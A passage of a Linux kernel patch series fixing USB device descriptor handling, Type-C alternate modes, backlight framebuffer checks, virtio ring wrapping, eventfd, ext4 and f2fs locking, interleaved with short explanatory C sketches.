++	 * Some superspeed devices have finished the link training process
++	 * and attached to a superspeed hub port, but the device descriptor
++	 * got from those devices show they aren't superspeed devices. Warm
++	 * reset the port attached by the devices can fix them.
++	 */
++	if ((udev->speed >= USB_SPEED_SUPER) &&
++			(le16_to_cpu(udev->descriptor.bcdUSB) < 0x0300)) {
++		dev_err(&udev->dev, "got a wrong device descriptor, warm reset device\n");
++		hub_port_reset(hub, port1, udev, HUB_BH_RESET_TIME, true);
++		retval = -EINVAL;
+ 		goto fail;
+ 	}
+ 
+@@ -5016,6 +5075,7 @@ fail:
+ 		hub_port_disable(hub, port1, 0);
+ 		update_devnum(udev, devnum);	/* for disconnect processing */
+ 	}
++	kfree(buf);
+ 	return retval;
+ }
+ 
+@@ -5096,7 +5156,7 @@ hub_power_remaining(struct usb_hub *hub)
+ 
+ 
+ static int descriptors_changed(struct usb_device *udev,
+-		struct usb_device_descriptor *old_device_descriptor,
++		struct usb_device_descriptor *new_device_descriptor,
+ 		struct usb_host_bos *old_bos)
+ {
+ 	int		changed = 0;
+@@ -5107,8 +5167,8 @@ static int descriptors_changed(struct usb_device *udev,
+ 	int		length;
+ 	char		*buf;
+ 
+-	if (memcmp(&udev->descriptor, old_device_descriptor,
+-			sizeof(*old_device_descriptor)) != 0)
++	if (memcmp(&udev->descriptor, new_device_descriptor,
++			sizeof(*new_device_descriptor)) != 0)
+ 		return 1;
+ 
+ 	if ((old_bos && !udev->bos) || (!old_bos && udev->bos))
+@@ -5281,7 +5341,7 @@ static void hub_port_connect(struct usb_hub *hub, int port1, u16 portstatus,
+ 		}
+ 
+ 		/* reset (non-USB 3.0 devices) and get descriptor */
+-		status = hub_port_init(hub, udev, port1, i);
++		status = hub_port_init(hub, udev, port1, i, NULL);
+ 		if (status < 0)
+ 			goto loop;
+ 
+@@ -5428,9 +5488,8 @@ static void hub_port_connect_change(struct usb_hub *hub, int port1,
+ {
+ 	struct usb_port *port_dev = hub->ports[port1 - 1];
+ 	struct usb_device *udev = port_dev->child;
+-	struct usb_device_descriptor descriptor;
++	struct usb_device_descriptor *descr;
+ 	int status = -ENODEV;
+-	int retval;
+ 
+ 	dev_dbg(&port_dev->dev, "status %04x, change %04x, %s\n", portstatus,
+ 			portchange, portspeed(hub, portstatus));
+@@ -5457,23 +5516,20 @@ static void hub_port_connect_change(struct usb_hub *hub, int port1,
+ 			 * changed device descriptors before resuscitating the
+ 			 * device.
+ 			 */
+-			descriptor = udev->descriptor;
+-			retval = usb_get_device_descriptor(udev,
+-					sizeof(udev->descriptor));
+-			if (retval < 0) {
++			descr = usb_get_device_descriptor(udev);
++			if (IS_ERR(descr)) {
+ 				dev_dbg(&udev->dev,
+-						"can't read device descriptor %d\n",
+-						retval);
++						"can't read device descriptor %ld\n",
++						PTR_ERR(descr));
+ 			} else {
+-				if (descriptors_changed(udev, &descriptor,
++				if (descriptors_changed(udev, descr,
+ 						udev->bos)) {
+ 					dev_dbg(&udev->dev,
+ 							"device descriptor has changed\n");
+-					/* for disconnect() calls */
+-					udev->descriptor = descriptor;
+ 				} else {
+ 					status = 0; /* Nothing to do */
+ 				}
++				kfree(descr);
+ 			}
+ #ifdef CONFIG_PM
+ 		} else if (udev->state == USB_STATE_SUSPENDED &&
+@@ -5911,7 +5967,7 @@ static int usb_reset_and_verify_device(struct usb_device *udev)
+ 	struct usb_device		*parent_hdev = udev->parent;
+ 	struct usb_hub			*parent_hub;
+ 	struct usb_hcd			*hcd = bus_to_hcd(udev->bus);
+-	struct usb_device_descriptor	descriptor = udev->descriptor;
++	struct usb_device_descriptor	descriptor;
+ 	struct usb_host_bos		*bos;
+ 	int				i, j, ret = 0;
+ 	int				port1 = udev->portnum;
+@@ -5943,7 +5999,7 @@ static int usb_reset_and_verify_device(struct usb_device *udev)
+ 		/* ep0 maxpacket size may change; let the HCD know about it.
+ 		 * Other endpoints will be handled by re-enumeration. */
+ 		usb_ep0_reinit(udev);
+-		ret = hub_port_init(parent_hub, udev, port1, i);
++		ret = hub_port_init(parent_hub, udev, port1, i, &descriptor);
+ 		if (ret >= 0 || ret == -ENOTCONN || ret == -ENODEV)
+ 			break;
+ 	}
+@@ -5955,7 +6011,6 @@ static int usb_reset_and_verify_device(struct usb_device *udev)
+ 	/* Device might have changed firmware (DFU or similar) */
+ 	if (descriptors_changed(udev, &descriptor, bos)) {
+ 		dev_info(&udev->dev, "device firmware changed\n");
+-		udev->descriptor = descriptor;	/* for disconnect() calls */
+ 		goto re_enumerate;
+ 	}
+ 
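The hub_port_init() rework above makes the speed-dependent decoding of bMaxPacketSize0 explicit: at SuperSpeed and above the descriptor field is a power-of-two exponent (9 encodes 512 bytes), while full and high speed store the byte count directly. A minimal user-space sketch of that decoding, with hypothetical names:

/*
 * Sketch of the ep0 maxpacket decoding: for SuperSpeed (and faster)
 * devices bMaxPacketSize0 is an exponent; for slower devices it is
 * the packet size itself.
 */
#include <stdio.h>

static int ep0_maxpacket(int super_speed, unsigned int bMaxPacketSize0)
{
	if (super_speed)
		return bMaxPacketSize0 <= 16 ? 1 << bMaxPacketSize0 : 0;
	return bMaxPacketSize0;		/* 8, 16, 32, or 64 for FS/HS */
}

int main(void)
{
	printf("SuperSpeed 9  -> %d\n", ep0_maxpacket(1, 9));	/* 512 */
	printf("high speed 64 -> %d\n", ep0_maxpacket(0, 64));	/* 64 */
	return 0;
}
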
+diff --git a/drivers/usb/core/message.c b/drivers/usb/core/message.c
+index 4d59d927ae3e3..1673e5d089263 100644
+--- a/drivers/usb/core/message.c
++++ b/drivers/usb/core/message.c
+@@ -1039,40 +1039,35 @@ char *usb_cache_string(struct usb_device *udev, int index)
+ }
+ 
+ /*
+- * usb_get_device_descriptor - (re)reads the device descriptor (usbcore)
+- * @dev: the device whose device descriptor is being updated
+- * @size: how much of the descriptor to read
++ * usb_get_device_descriptor - read the device descriptor
++ * @udev: the device whose device descriptor should be read
+  *
+  * Context: task context, might sleep.
+  *
+- * Updates the copy of the device descriptor stored in the device structure,
+- * which dedicates space for this purpose.
+- *
+  * Not exported, only for use by the core.  If drivers really want to read
+  * the device descriptor directly, they can call usb_get_descriptor() with
+  * type = USB_DT_DEVICE and index = 0.
+  *
+- * This call is synchronous, and may not be used in an interrupt context.
+- *
+- * Return: The number of bytes received on success, or else the status code
+- * returned by the underlying usb_control_msg() call.
++ * Returns: a pointer to a dynamically allocated usb_device_descriptor
++ * structure (which the caller must deallocate), or an ERR_PTR value.
+  */
+-int usb_get_device_descriptor(struct usb_device *dev, unsigned int size)
++struct usb_device_descriptor *usb_get_device_descriptor(struct usb_device *udev)
+ {
+ 	struct usb_device_descriptor *desc;
+ 	int ret;
+ 
+-	if (size > sizeof(*desc))
+-		return -EINVAL;
+ 	desc = kmalloc(sizeof(*desc), GFP_NOIO);
+ 	if (!desc)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
++
++	ret = usb_get_descriptor(udev, USB_DT_DEVICE, 0, desc, sizeof(*desc));
++	if (ret == sizeof(*desc))
++		return desc;
+ 
+-	ret = usb_get_descriptor(dev, USB_DT_DEVICE, 0, desc, size);
+ 	if (ret >= 0)
+-		memcpy(&dev->descriptor, desc, size);
++		ret = -EMSGSIZE;
+ 	kfree(desc);
+-	return ret;
++	return ERR_PTR(ret);
+ }
+ 
+ /*
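usb_get_device_descriptor() now follows the kernel's ERR_PTR convention: a single pointer return carries either a valid allocation or a negative errno. A self-contained user-space sketch of that convention (the helpers mirror the kernel ones; the descriptor struct is a stand-in):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_ERRNO 4095

static inline void *ERR_PTR(long error) { return (void *)error; }
static inline long PTR_ERR(const void *ptr) { return (long)ptr; }
static inline int IS_ERR(const void *ptr)
{
	return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

struct device_descriptor { uint8_t bMaxPacketSize0; };

/* Returns a heap descriptor the caller must free, or an ERR_PTR. */
static struct device_descriptor *get_descriptor(int simulate_short_read)
{
	struct device_descriptor *d;

	if (simulate_short_read)
		return ERR_PTR(-EMSGSIZE);
	d = malloc(sizeof(*d));
	if (!d)
		return ERR_PTR(-ENOMEM);
	d->bMaxPacketSize0 = 64;
	return d;
}

int main(void)
{
	struct device_descriptor *d = get_descriptor(0);

	if (IS_ERR(d)) {
		fprintf(stderr, "error %ld\n", PTR_ERR(d));
		return 1;
	}
	printf("bMaxPacketSize0 = %u\n", d->bMaxPacketSize0);
	free(d);
	return 0;
}
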
+diff --git a/drivers/usb/core/usb.h b/drivers/usb/core/usb.h
+index 82538daac8b89..3bb2e1db42b5d 100644
+--- a/drivers/usb/core/usb.h
++++ b/drivers/usb/core/usb.h
+@@ -42,8 +42,8 @@ extern bool usb_endpoint_is_ignored(struct usb_device *udev,
+ 		struct usb_endpoint_descriptor *epd);
+ extern int usb_remove_device(struct usb_device *udev);
+ 
+-extern int usb_get_device_descriptor(struct usb_device *dev,
+-		unsigned int size);
++extern struct usb_device_descriptor *usb_get_device_descriptor(
++		struct usb_device *udev);
+ extern int usb_set_isoch_delay(struct usb_device *dev);
+ extern int usb_get_bos_descriptor(struct usb_device *dev);
+ extern void usb_release_bos_descriptor(struct usb_device *dev);
+diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
+index 3abf7f586e2af..7b9a4cf9b100c 100644
+--- a/drivers/usb/gadget/function/f_mass_storage.c
++++ b/drivers/usb/gadget/function/f_mass_storage.c
+@@ -926,7 +926,7 @@ static void invalidate_sub(struct fsg_lun *curlun)
+ {
+ 	struct file	*filp = curlun->filp;
+ 	struct inode	*inode = file_inode(filp);
+-	unsigned long	rc;
++	unsigned long __maybe_unused	rc;
+ 
+ 	rc = invalidate_mapping_pages(inode->i_mapping, 0, -1);
+ 	VLDBG(curlun, "invalidate_mapping_pages -> %ld\n", rc);
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 316e9cc3987be..1c0c61e8ba696 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -40,6 +40,7 @@ static struct bus_type gadget_bus_type;
+  * @allow_connect: Indicates whether UDC is allowed to be pulled up.
+  * Set/cleared by gadget_(un)bind_driver() after gadget driver is bound or
+  * unbound.
++ * @vbus_work: work routine to handle VBUS status change notifications.
+  * @connect_lock: protects udc->started, gadget->connect,
+  * gadget->allow_connect and gadget->deactivate. The routines
+  * usb_gadget_connect_locked(), usb_gadget_disconnect_locked(),
+diff --git a/drivers/usb/phy/phy-mxs-usb.c b/drivers/usb/phy/phy-mxs-usb.c
+index d2836ef5d15c7..9299df53eb9df 100644
+--- a/drivers/usb/phy/phy-mxs-usb.c
++++ b/drivers/usb/phy/phy-mxs-usb.c
+@@ -388,14 +388,8 @@ static void __mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool disconnect)
+ 
+ static bool mxs_phy_is_otg_host(struct mxs_phy *mxs_phy)
+ {
+-	void __iomem *base = mxs_phy->phy.io_priv;
+-	u32 phyctrl = readl(base + HW_USBPHY_CTRL);
+-
+-	if (IS_ENABLED(CONFIG_USB_OTG) &&
+-			!(phyctrl & BM_USBPHY_CTRL_OTG_ID_VALUE))
+-		return true;
+-
+-	return false;
++	return IS_ENABLED(CONFIG_USB_OTG) &&
++		mxs_phy->phy.last_event == USB_EVENT_ID;
+ }
+ 
+ static void mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool on)
+diff --git a/drivers/usb/typec/bus.c b/drivers/usb/typec/bus.c
+index 31c2a3130cadb..69442a8135856 100644
+--- a/drivers/usb/typec/bus.c
++++ b/drivers/usb/typec/bus.c
+@@ -154,12 +154,20 @@ EXPORT_SYMBOL_GPL(typec_altmode_exit);
+  *
+  * Notifies the partner of @adev about Attention command.
+  */
+-void typec_altmode_attention(struct typec_altmode *adev, u32 vdo)
++int typec_altmode_attention(struct typec_altmode *adev, u32 vdo)
+ {
+-	struct typec_altmode *pdev = &to_altmode(adev)->partner->adev;
++	struct altmode *partner = to_altmode(adev)->partner;
++	struct typec_altmode *pdev;
++
++	if (!partner)
++		return -ENODEV;
++
++	pdev = &partner->adev;
+ 
+ 	if (pdev->ops && pdev->ops->attention)
+ 		pdev->ops->attention(pdev, vdo);
++
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(typec_altmode_attention);
+ 
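typec_altmode_attention() now fails gracefully when no partner altmode has been registered instead of dereferencing a NULL pointer. A minimal sketch of the guard, with hypothetical types:

#include <errno.h>
#include <stddef.h>
#include <stdio.h>

struct altmode { struct altmode *partner; };

/* Forwarding an Attention VDO requires a registered partner altmode. */
static int altmode_attention(struct altmode *adev)
{
	if (!adev->partner)
		return -ENODEV;	/* caller logs this and carries on */
	/* ... hand the VDO to the partner's ops here ... */
	return 0;
}

int main(void)
{
	struct altmode orphan = { .partner = NULL };

	printf("no partner -> %d\n", altmode_attention(&orphan));
	return 0;
}
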
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 5f45b82dd1914..ad4d0314d27fa 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1871,7 +1871,8 @@ static void tcpm_handle_vdm_request(struct tcpm_port *port,
+ 			}
+ 			break;
+ 		case ADEV_ATTENTION:
+-			typec_altmode_attention(adev, p[1]);
++			if (typec_altmode_attention(adev, p[1]))
++				tcpm_log(port, "typec_altmode_attention no port partner altmode");
+ 			break;
+ 		}
+ 	}
+@@ -3929,6 +3930,29 @@ static enum typec_cc_status tcpm_pwr_opmode_to_rp(enum typec_pwr_opmode opmode)
+ 	}
+ }
+ 
++static void tcpm_set_initial_svdm_version(struct tcpm_port *port)
++{
++	switch (port->negotiated_rev) {
++	case PD_REV30:
++		break;
++	/*
++	 * 6.4.4.2.3 Structured VDM Version
++	 * 2.0 states "At this time, there is only one version (1.0) defined.
++	 * This field Shall be set to zero to indicate Version 1.0."
++	 * 3.0 states "This field Shall be set to 01b to indicate Version 2.0."
++	 * To ensure that we follow the Power Delivery revision we are currently
++	 * operating on, downgrade the SVDM version to the highest one supported
++	 * by the Power Delivery revision.
++	 */
++	case PD_REV20:
++		typec_partner_set_svdm_version(port->partner, SVDM_VER_1_0);
++		break;
++	default:
++		typec_partner_set_svdm_version(port->partner, SVDM_VER_1_0);
++		break;
++	}
++}
++
+ static void run_state_machine(struct tcpm_port *port)
+ {
+ 	int ret;
+@@ -4153,10 +4177,12 @@ static void run_state_machine(struct tcpm_port *port)
+ 		 * For now, this driver only supports SOP for DISCOVER_IDENTITY, thus using
+ 		 * port->explicit_contract to decide whether to send the command.
+ 		 */
+-		if (port->explicit_contract)
++		if (port->explicit_contract) {
++			tcpm_set_initial_svdm_version(port);
+ 			mod_send_discover_delayed_work(port, 0);
+-		else
++		} else {
+ 			port->send_discover = false;
++		}
+ 
+ 		/*
+ 		 * 6.3.5
+@@ -4439,10 +4465,12 @@ static void run_state_machine(struct tcpm_port *port)
+ 		 * For now, this driver only supports SOP for DISCOVER_IDENTITY, thus using
+ 		 * port->explicit_contract.
+ 		 */
+-		if (port->explicit_contract)
++		if (port->explicit_contract) {
++			tcpm_set_initial_svdm_version(port);
+ 			mod_send_discover_delayed_work(port, 0);
+-		else
++		} else {
+ 			port->send_discover = false;
++		}
+ 
+ 		power_supply_changed(port->psy);
+ 		break;
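tcpm_set_initial_svdm_version() pins the SVDM version to what the negotiated Power Delivery revision allows: PD 2.0 (and any unknown revision) gets SVDM 1.0, while PD 3.0 keeps the default. A sketch of that mapping, assuming the port's default is SVDM 2.0:

#include <stdio.h>

enum pd_rev { PD_REV20, PD_REV30 };
enum svdm_ver { SVDM_VER_1_0, SVDM_VER_2_0 };

/* PD 2.0 only defines SVDM 1.0; PD 3.0 may keep the SVDM 2.0 default.
 * Unknown revisions are downgraded conservatively to SVDM 1.0. */
static enum svdm_ver initial_svdm_version(enum pd_rev rev)
{
	return rev == PD_REV30 ? SVDM_VER_2_0 : SVDM_VER_1_0;
}

int main(void)
{
	printf("PD 2.0 -> SVDM %s\n",
	       initial_svdm_version(PD_REV20) == SVDM_VER_1_0 ? "1.0" : "2.0");
	printf("PD 3.0 -> SVDM %s\n",
	       initial_svdm_version(PD_REV30) == SVDM_VER_1_0 ? "1.0" : "2.0");
	return 0;
}
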
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 009ba186652ac..18a2dbbc77799 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -2822,7 +2822,7 @@ static int vfio_iommu_iova_build_caps(struct vfio_iommu *iommu,
+ static int vfio_iommu_migration_build_caps(struct vfio_iommu *iommu,
+ 					   struct vfio_info_cap *caps)
+ {
+-	struct vfio_iommu_type1_info_cap_migration cap_mig;
++	struct vfio_iommu_type1_info_cap_migration cap_mig = {};
+ 
+ 	cap_mig.header.id = VFIO_IOMMU_TYPE1_INFO_CAP_MIGRATION;
+ 	cap_mig.header.version = 1;
+diff --git a/drivers/video/backlight/bd6107.c b/drivers/video/backlight/bd6107.c
+index a506872d43963..94fe628dd88c0 100644
+--- a/drivers/video/backlight/bd6107.c
++++ b/drivers/video/backlight/bd6107.c
+@@ -104,7 +104,7 @@ static int bd6107_backlight_check_fb(struct backlight_device *backlight,
+ {
+ 	struct bd6107 *bd = bl_get_data(backlight);
+ 
+-	return bd->pdata->fbdev == NULL || bd->pdata->fbdev == info->dev;
++	return bd->pdata->fbdev == NULL || bd->pdata->fbdev == info->device;
+ }
+ 
+ static const struct backlight_ops bd6107_backlight_ops = {
+diff --git a/drivers/video/backlight/gpio_backlight.c b/drivers/video/backlight/gpio_backlight.c
+index 6f78d928f054a..5c5c99f7979e3 100644
+--- a/drivers/video/backlight/gpio_backlight.c
++++ b/drivers/video/backlight/gpio_backlight.c
+@@ -35,7 +35,7 @@ static int gpio_backlight_check_fb(struct backlight_device *bl,
+ {
+ 	struct gpio_backlight *gbl = bl_get_data(bl);
+ 
+-	return gbl->fbdev == NULL || gbl->fbdev == info->dev;
++	return gbl->fbdev == NULL || gbl->fbdev == info->device;
+ }
+ 
+ static const struct backlight_ops gpio_backlight_ops = {
+diff --git a/drivers/video/backlight/lv5207lp.c b/drivers/video/backlight/lv5207lp.c
+index 767b800d79faf..8a027a5ea552b 100644
+--- a/drivers/video/backlight/lv5207lp.c
++++ b/drivers/video/backlight/lv5207lp.c
+@@ -67,7 +67,7 @@ static int lv5207lp_backlight_check_fb(struct backlight_device *backlight,
+ {
+ 	struct lv5207lp *lv = bl_get_data(backlight);
+ 
+-	return lv->pdata->fbdev == NULL || lv->pdata->fbdev == info->dev;
++	return lv->pdata->fbdev == NULL || lv->pdata->fbdev == info->device;
+ }
+ 
+ static const struct backlight_ops lv5207lp_backlight_ops = {
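The three backlight fixes above share one bug: fb_info.dev is the fbdev class device, whereas the driver's platform data names the parent hardware device, which lives in fb_info.device. A sketch of the corrected check, with stand-in types:

#include <stddef.h>
#include <stdio.h>

struct device { const char *name; };
struct fb_info {
	struct device *dev;	/* fbdev class device */
	struct device *device;	/* parent hardware device */
};

/* Platform data names the parent device, so compare against ->device. */
static int check_fb(struct device *pdata_fbdev, struct fb_info *info)
{
	return pdata_fbdev == NULL || pdata_fbdev == info->device;
}

int main(void)
{
	struct device parent = { "hw" }, class = { "fb0" };
	struct fb_info info = { .dev = &class, .device = &parent };

	printf("parent matches: %d\n", check_fb(&parent, &info));	/* 1 */
	printf("class matches:  %d\n", check_fb(&class, &info));	/* 0 */
	return 0;
}
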
+diff --git a/drivers/virtio/virtio_ring.c b/drivers/virtio/virtio_ring.c
+index 90d514c141794..7d320f799ca1e 100644
+--- a/drivers/virtio/virtio_ring.c
++++ b/drivers/virtio/virtio_ring.c
+@@ -1449,7 +1449,7 @@ static inline int virtqueue_add_packed(struct virtqueue *_vq,
+ 		}
+ 	}
+ 
+-	if (i < head)
++	if (i <= head)
+ 		vq->packed.avail_wrap_counter ^= 1;
+ 
+ 	/* We're using some buffers from the free list. */
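The virtio fix widens the wrap test from i < head to i <= head: a descriptor chain that fills the ring exactly leaves the producer index back on the chain head, and the avail wrap counter must still toggle. A small sketch of that boundary case:

#include <stdio.h>

int main(void)
{
	unsigned int ring_size = 4, head = 0, wrap = 1;
	unsigned int i = head, descs = 4;	/* chain fills the whole ring */

	for (unsigned int n = 0; n < descs; n++)
		i = (i + 1) % ring_size;	/* i lands back on head */

	if (i <= head)	/* "i < head" would miss the i == head case */
		wrap ^= 1;
	printf("next index %u, wrap counter %u\n", i, wrap);
	return 0;
}
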
+diff --git a/fs/dlm/plock.c b/fs/dlm/plock.c
+index 739e7d55c9e3d..1bf5c51a4c23b 100644
+--- a/fs/dlm/plock.c
++++ b/fs/dlm/plock.c
+@@ -455,7 +455,8 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 		}
+ 	} else {
+ 		list_for_each_entry(iter, &recv_list, list) {
+-			if (!iter->info.wait) {
++			if (!iter->info.wait &&
++			    iter->info.fsid == info.fsid) {
+ 				op = iter;
+ 				break;
+ 			}
+@@ -467,8 +468,7 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 		if (info.wait)
+ 			WARN_ON(op->info.optype != DLM_PLOCK_OP_LOCK);
+ 		else
+-			WARN_ON(op->info.fsid != info.fsid ||
+-				op->info.number != info.number ||
++			WARN_ON(op->info.number != info.number ||
+ 				op->info.owner != info.owner ||
+ 				op->info.optype != info.optype);
+ 
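The dlm change tightens the reply lookup so a result written from user space can only complete an op belonging to the same filesystem: the fsid check moves from an after-the-fact WARN_ON into the match itself. A minimal sketch of the stricter match:

#include <stddef.h>
#include <stdio.h>

struct plock_op { unsigned int fsid, number; int wait; };

/* A non-wait reply only matches an op from the same lockspace. */
static const struct plock_op *find_op(const struct plock_op *ops, int n,
				      unsigned int fsid)
{
	for (int i = 0; i < n; i++)
		if (!ops[i].wait && ops[i].fsid == fsid)
			return &ops[i];
	return NULL;
}

int main(void)
{
	struct plock_op ops[] = { { .fsid = 1 }, { .fsid = 2 } };
	const struct plock_op *op = find_op(ops, 2, 2);

	printf("matched fsid %u\n", op ? op->fsid : 0);	/* 2 */
	return 0;
}
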
+diff --git a/fs/eventfd.c b/fs/eventfd.c
+index 249ca6c0b7843..4a60ea932e3d9 100644
+--- a/fs/eventfd.c
++++ b/fs/eventfd.c
+@@ -189,7 +189,7 @@ void eventfd_ctx_do_read(struct eventfd_ctx *ctx, __u64 *cnt)
+ {
+ 	lockdep_assert_held(&ctx->wqh.lock);
+ 
+-	*cnt = (ctx->flags & EFD_SEMAPHORE) ? 1 : ctx->count;
++	*cnt = ((ctx->flags & EFD_SEMAPHORE) && ctx->count) ? 1 : ctx->count;
+ 	ctx->count -= *cnt;
+ }
+ EXPORT_SYMBOL_GPL(eventfd_ctx_do_read);
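The eventfd change makes a semaphore-mode read of a zero counter report 0 instead of claiming one event. For reference, a user-space sketch of EFD_SEMAPHORE semantics, where each successful read returns 1 and decrements the counter by 1:

#include <stdint.h>
#include <stdio.h>
#include <sys/eventfd.h>
#include <unistd.h>

int main(void)
{
	uint64_t val;
	int fd = eventfd(3, EFD_SEMAPHORE | EFD_NONBLOCK);

	if (fd < 0) {
		perror("eventfd");
		return 1;
	}
	/* Three reads return 1 each; the fourth fails with EAGAIN. */
	for (int i = 0; i < 4; i++) {
		if (read(fd, &val, sizeof(val)) == sizeof(val))
			printf("read %d -> %llu\n", i, (unsigned long long)val);
		else
			perror("read");
	}
	close(fd);
	return 0;
}
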
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 88ed64ebae3e7..016925b1a0908 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -966,8 +966,9 @@ static inline int should_optimize_scan(struct ext4_allocation_context *ac)
+  * Return next linear group for allocation. If linear traversal should not be
+  * performed, this function just returns the same group
+  */
+-static int
+-next_linear_group(struct ext4_allocation_context *ac, int group, int ngroups)
++static ext4_group_t
++next_linear_group(struct ext4_allocation_context *ac, ext4_group_t group,
++		  ext4_group_t ngroups)
+ {
+ 	if (!should_optimize_scan(ac))
+ 		goto inc_and_return;
+@@ -2401,7 +2402,7 @@ static bool ext4_mb_good_group(struct ext4_allocation_context *ac,
+ 
+ 	BUG_ON(cr < 0 || cr >= 4);
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(grp) || !grp))
++	if (unlikely(!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp)))
+ 		return false;
+ 
+ 	free = grp->bb_free;
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 0e1aeb9cb4a7c..6a08fc31a66de 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -2799,6 +2799,7 @@ static int ext4_add_nondir(handle_t *handle,
+ 		return err;
+ 	}
+ 	drop_nlink(inode);
++	ext4_mark_inode_dirty(handle, inode);
+ 	ext4_orphan_add(handle, inode);
+ 	unlock_new_inode(inode);
+ 	return err;
+@@ -3436,6 +3437,7 @@ retry:
+ 
+ err_drop_inode:
+ 	clear_nlink(inode);
++	ext4_mark_inode_dirty(handle, inode);
+ 	ext4_orphan_add(handle, inode);
+ 	unlock_new_inode(inode);
+ 	if (handle)
+@@ -4021,6 +4023,7 @@ end_rename:
+ 			ext4_resetent(handle, &old,
+ 				      old.inode->i_ino, old_file_type);
+ 			drop_nlink(whiteout);
++			ext4_mark_inode_dirty(handle, whiteout);
+ 			ext4_orphan_add(handle, whiteout);
+ 		}
+ 		unlock_new_inode(whiteout);
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 4d1e48c676fab..c2b7d09238941 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -4453,7 +4453,8 @@ static inline bool f2fs_low_mem_mode(struct f2fs_sb_info *sbi)
+ static inline bool f2fs_may_compress(struct inode *inode)
+ {
+ 	if (IS_SWAPFILE(inode) || f2fs_is_pinned_file(inode) ||
+-		f2fs_is_atomic_file(inode) || f2fs_has_inline_data(inode))
++		f2fs_is_atomic_file(inode) || f2fs_has_inline_data(inode) ||
++		f2fs_is_mmap_file(inode))
+ 		return false;
+ 	return S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode);
+ }
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 7b94f047cbf79..746c71716bead 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -530,7 +530,11 @@ static int f2fs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 
+ 	file_accessed(file);
+ 	vma->vm_ops = &f2fs_file_vm_ops;
++
++	f2fs_down_read(&F2FS_I(inode)->i_sem);
+ 	set_inode_flag(inode, FI_MMAP_FILE);
++	f2fs_up_read(&F2FS_I(inode)->i_sem);
++
+ 	return 0;
+ }
+ 
+@@ -1927,12 +1931,19 @@ static int f2fs_setflags_common(struct inode *inode, u32 iflags, u32 mask)
+ 			int err = f2fs_convert_inline_inode(inode);
+ 			if (err)
+ 				return err;
+-			if (!f2fs_may_compress(inode))
+-				return -EINVAL;
+-			if (S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))
++
++			f2fs_down_write(&F2FS_I(inode)->i_sem);
++			if (!f2fs_may_compress(inode) ||
++					(S_ISREG(inode->i_mode) &&
++					F2FS_HAS_BLOCKS(inode))) {
++				f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 				return -EINVAL;
+-			if (set_compress_context(inode))
+-				return -EOPNOTSUPP;
++			}
++			err = set_compress_context(inode);
++			f2fs_up_write(&F2FS_I(inode)->i_sem);
++
++			if (err)
++				return err;
+ 		}
+ 	}
+ 
+@@ -3958,6 +3969,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 	file_start_write(filp);
+ 	inode_lock(inode);
+ 
++	f2fs_down_write(&F2FS_I(inode)->i_sem);
+ 	if (f2fs_is_mmap_file(inode) || get_dirty_pages(inode)) {
+ 		ret = -EBUSY;
+ 		goto out;
+@@ -3977,6 +3989,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 		f2fs_warn(sbi, "compression algorithm is successfully set, "
+ 			"but current kernel doesn't support this algorithm.");
+ out:
++	f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 	inode_unlock(inode);
+ 	file_end_write(filp);
+ 
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index aab3b8b3ab0a7..1fc7760499f10 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -397,6 +397,12 @@ static int do_read_inode(struct inode *inode)
+ 		fi->i_inline_xattr_size = 0;
+ 	}
+ 
++	if (!sanity_check_inode(inode, node_page)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
+ 	/* check data exist */
+ 	if (f2fs_has_inline_data(inode) && !f2fs_exist_data(inode))
+ 		__recover_inline_status(inode, node_page);
+@@ -459,12 +465,6 @@ static int do_read_inode(struct inode *inode)
+ 	/* Need all the flag bits */
+ 	f2fs_init_read_extent_tree(inode, node_page);
+ 
+-	if (!sanity_check_inode(inode, node_page)) {
+-		f2fs_put_page(node_page, 1);
+-		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	if (!sanity_check_extent_cache(inode)) {
+ 		f2fs_put_page(node_page, 1);
+ 		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
